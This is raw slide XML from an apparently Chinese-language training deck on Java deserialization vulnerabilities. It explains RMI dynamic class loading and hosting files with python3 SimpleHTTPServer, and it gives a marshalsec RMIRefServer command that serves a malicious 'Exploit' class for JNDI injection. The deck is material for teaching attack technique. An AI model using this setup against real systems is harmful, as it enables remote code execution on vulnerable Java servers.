              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="4800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>作为</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="4800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="4800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>服务器，将需要的文件放入到</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="4800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>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4800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
              <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华文楷体" panose="0201060004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4800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
              <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1037174" y="2711801"/>
            <a:ext cx="10405413" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:lumMod val="40000"/>
              <a:lumOff val="60000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>python3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>中使用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>SimpleHTTPServer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>功能</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1030682" y="9187355"/>
            <a:ext cx="13626507" cy="1002724"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="887669809"/>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20679"/>
            <a:ext cx="6871113" cy="11970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zh-CN" altLang="en-US" sz="5400" dirty="0"/>
              <a:t>反序列化</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="5400" dirty="0"/>
              <a:t>0day</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="5400" dirty="0"/>
              <a:t>漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="865239" y="2356338"/>
            <a:ext cx="22407716" cy="1508105"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="136EC2"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>RMI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Remote Method Invocation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="136EC2"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>远程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>方法调用）是用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>JDK1.2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>中实现的，它大大增强了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>开发</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="136EC2"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>分布式应用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>的能力</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>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3" name="矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="920891" y="3978952"/>
            <a:ext cx="22407717" cy="5755422"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>RMI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>核心特点之一就是动态类加载，如果当前</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>JVM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>中没有某个类的定义，它可以从远程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>去下载这个类的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>，动态加载的对象</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>文件可以使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>服务的方式进行托管。这可以动态的扩展远程应用的功能，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>RMI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>注册表上可以动态的加载绑定多个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>RMI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>应用。对于客户端而言，服务端返回值也可能是一些子类的对象实例，而客户端并没有这些子类的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>文件，如果需要客户端正确调用这些子类中被重写的方法，则同样需要有运行时动态加载额外类的能力。客户端使用了与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>RMI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>注册表相同的机制。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>RMI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>服务端将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>传递给客户端，客户端通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>请求下载这些类。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>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70299463"/>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20679"/>
            <a:ext cx="6871113" cy="11970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zh-CN" altLang="en-US" sz="5400" dirty="0"/>
              <a:t>反序列化</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="5400" dirty="0"/>
              <a:t>0day</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="5400" dirty="0"/>
              <a:t>漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="865239" y="2356338"/>
            <a:ext cx="22407716" cy="800219"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="136EC2"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="136EC2"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>marshalsec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="136EC2"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>使用</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1040768" y="3811259"/>
            <a:ext cx="8642109" cy="800219"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>开启</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>rmi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>服务，恶意类放到服务上</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1030682" y="5396062"/>
            <a:ext cx="21327873" cy="1508105"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="60000"/>
              <a:lumOff val="40000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>java -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>cp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> marshalsec-0.0.3-SNAPSHOT-all.jar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>marshalsec.jndi.RMIRefServer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> http://127.0.0.1:8080/#Exploit 1099</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1257507" y="7688751"/>
            <a:ext cx="3517309" cy="800219"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>开启</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>ldap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>服务</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="矩形 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
